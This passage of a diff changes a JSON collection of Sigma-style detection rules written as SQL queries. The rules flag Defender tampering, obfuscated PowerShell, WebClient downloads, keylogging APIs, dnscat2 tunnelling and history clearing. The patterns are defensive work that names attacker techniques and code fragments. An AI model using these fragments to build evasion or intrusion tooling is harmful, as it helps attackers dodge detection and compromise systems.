"attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate crashing of the lsass process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_werfault_susp_lsass_credential_dump.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Windows Defender Suspicious Configuration Changes", - "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", - "status": "stable", - "description": "Detects suspicious changes to the windows defender configuration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", + "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", + "status": "experimental", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator activity (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" ], - "filename": "win_defender_suspicious_features_tampering.yml" + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" }, { - "title": "Win Defender Restored Quarantine File", - "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", + "title": "Suspicious PowerShell Download - PoshModule", + "id": "de41232e-12e8-49fa-86bc-c05c7e722df9", "status": "experimental", - "description": "Detects the restoration of files from the defender quarantine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrator activity restoring a file" + "PowerShell scripts that download content from the Internet" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ContextInfo LIKE '%.DownloadFile(%' ESCAPE '\\' OR ContextInfo LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "win_defender_restored_quarantine_file.yml" + "filename": "posh_pm_susp_download.yml" }, { - "title": "Windows Defender Malware Detection History Deletion", - "id": "2afe6582-e149-11ea-87d0-0242ac130003", + "title": "Alternate PowerShell Hosts - PowerShell Module", + "id": "64e8e417-c19a-475a-8d19-98ea705394cc", "status": "test", - "description": "Windows Defender logs when the history of detected infections is deleted. Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".", - "author": "Cian Heasley", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Deletion of Defender malware detections history for legitimate reasons" + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1013')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ContextInfo LIKE '%' ESCAPE '\\' AND NOT (((ContextInfo LIKE '%= powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/System32/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\')) OR (ContextInfo LIKE '%= C:\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe -Embedding%' ESCAPE '\\') OR (ContextInfo LIKE '%ConfigSyncRun.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\dsac.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\wsmprovhost.exe -Embedding%' ESCAPE '\\') OR ((Payload LIKE '%Update-Help%' ESCAPE '\\' OR Payload LIKE '%Failed to update Help for the module%' ESCAPE '\\'))))" ], - "filename": "win_defender_history_delete.yml" + "filename": "posh_pm_alternate_powershell_hosts.yml" }, { - "title": "Windows Defender Exploit Guard Tamper", - "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", - "status": "experimental", - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Silence.EDA Detection", + "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "status": "test", + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "author": "Alina Stepchenkova, Group-IB, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", + "attack.impact", + "attack.t1529", + "attack.g0091", + "attack.s0363" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" ], - "filename": "win_defender_exploit_guard_tamper.yml" + "filename": "posh_ps_apt_silence_eda.yml" }, { - "title": "LSASS Access Detected via Attack Surface Reduction", - "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", + "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "status": "experimental", - "description": "Detects Access to LSASS Process", - "author": "Markus Neis", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_defender_alert_lsass_access.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "Windows Defender Exclusions Added", - "id": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", - "status": "stable", - "description": "Detects the Setting of Windows Defender Exclusions", - "author": "Christian Burkard (Nextron Systems)", + "title": "DirectorySearcher Powershell Exploitation", + "id": "1f6399cf-2c80-4924-ace1-6fcff3393480", + "status": "test", + "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Administrator actions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND NewValue LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object %' ESCAPE '\\' AND ScriptBlockText LIKE '%System.DirectoryServices.DirectorySearcher%' ESCAPE '\\' AND ScriptBlockText LIKE '%.PropertiesToLoad.Add%' ESCAPE '\\' AND ScriptBlockText LIKE '%.findall()%' ESCAPE '\\' AND ScriptBlockText LIKE '%Properties.name%' ESCAPE '\\')" ], - "filename": "win_defender_exclusions.yml" + "filename": "posh_ps_directorysearcher.yml" }, { - "title": "PSExec and WMI Process Creations Block", - "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", - "status": "test", - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "author": "Bhabesh Raj", + "title": "Active Directory Computers Enumeration with Get-AdComputer", + "id": "36bed6b2-e9a0-4fff-beeb-413a92b86138", + "status": "experimental", + "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers within Active Directory.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1047", - "attack.t1569.002" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\')" ], - "filename": "win_defender_psexec_wmi_asr.yml" + "filename": "posh_ps_get_adcomputer.yml" }, { - "title": "Windows Defender AMSI Trigger Detected", - "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "status": "stable", - "description": "Detects triggering of AMSI by Windows Defender.", - "author": "Bhabesh Raj", + "title": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", + "id": "c2993223-6da8-4b1a-88ee-668b8bf315e9", + "status": "experimental", + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% > %' ESCAPE '\\' OR ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" ], - "filename": "win_defender_amsi_trigger.yml" + "filename": "posh_ps_user_discovery_get_aduser.yml" }, { - "title": "Microsoft Defender Tamper Protection Trigger", - "id": "49e5bc24-8b86-49f1-b743-535f332c2856", - "status": "stable", - "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", - "author": "Bhabesh Raj, Nasreddine Bencherchali", + "title": "Clearing Windows Console History", + "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "status": "test", + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1070.003" ], "falsepositives": [ - "Administrator might try to disable defender features during testing (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" ], - "filename": "win_defender_tamper_protection_trigger.yml" + "filename": "posh_ps_clearing_windows_console_history.yml" }, { - "title": "Windows Defender Threat Detection Disabled", - "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "status": "stable", - "description": "Detects disabling Windows Defender threat protection", - "author": "Ján Trenčanský, frack113", + "title": "Disable-WindowsOptionalFeature Command PowerShell", + "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", + "status": "experimental", + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Administrator actions (should be investigated)", - "Seen being triggered occasionally during Windows 8 Defender Updates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" ], - "filename": "win_defender_disabled.yml" + "filename": "posh_ps_disable_windows_optional_feature.yml" }, { - "title": "Windows Defender Threat Detected", - "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", - "status": "stable", - "description": "Detects all actions taken by Windows Defender malware detection engines", - "author": "Ján Trenčanský", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", + "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" ], - "filename": "win_defender_threat.yml" + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Important Scheduled Task Deleted", - "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "title": "Suspicious PowerShell Download - Powershell Script", + "id": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", "status": "experimental", - "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "PowerShell scripts that download content from the Internet" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.DownloadFile(%' ESCAPE '\\' OR ScriptBlockText LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "win_taskscheduler_susp_schtasks_delete.yml" + "filename": "posh_ps_susp_download.yml" }, { - "title": "Scheduled Task Executed From A Suspicious Location", - "id": "424273ea-7cf8-43a6-b712-375f925e481f", - "status": "experimental", - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Use Remove-Item to Delete File", + "id": "b8af5f36-1361-4ebe-9e76-e36128d947bf", + "status": "test", + "description": "Powershell Remove-Item with -Path to delete a file or a folder with \"-Recurse\"", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '%HKCU:\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%HKLM:\\\\%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_execution_from_susp_locations.yml" + "filename": "posh_ps_remove_item_path.yml" }, { - "title": "Scheduled Task Executed Uncommon LOLBIN", - "id": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", + "title": "Powershell Keylogging", + "id": "34f90d3c-c297-49e9-b26d-911b05a4866c", "status": "experimental", - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.collection", + "attack.t1056.001" ], "falsepositives": [ - "False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%\\\\calc.exe' ESCAPE '\\' OR Path LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Path LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Path LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR Path LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Path LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Path LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR (ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetAsyncKeyState%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetForegroundWindow%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_lolbin_execution_via_task_scheduler.yml" + "filename": "posh_ps_keylogging.yml" }, { - "title": "Suspicious Task Added by Bitsadmin", - "id": "1ff315dc-2a3a-4b71-8dde-873818d25d39", + "title": "Suspicious Process Discovery With Get-Process", + "id": "af4c87ce-bdda-4215-b998-15220772e993", "status": "test", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "description": "Get the processes that are running on the local computer.", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.discovery", + "attack.t1057" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Legitimate PowerShell scripts" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '3' AND processPath LIKE '%\\\\bitsadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_use_bitsadmin.yml" + "filename": "posh_ps_susp_get_process.yml" }, { - "title": "Suspicious Download with BITS from Direct IP", - "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", + "title": "Add New Windows Capability - ScriptBlock", + "id": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a direct IP. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", + "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' 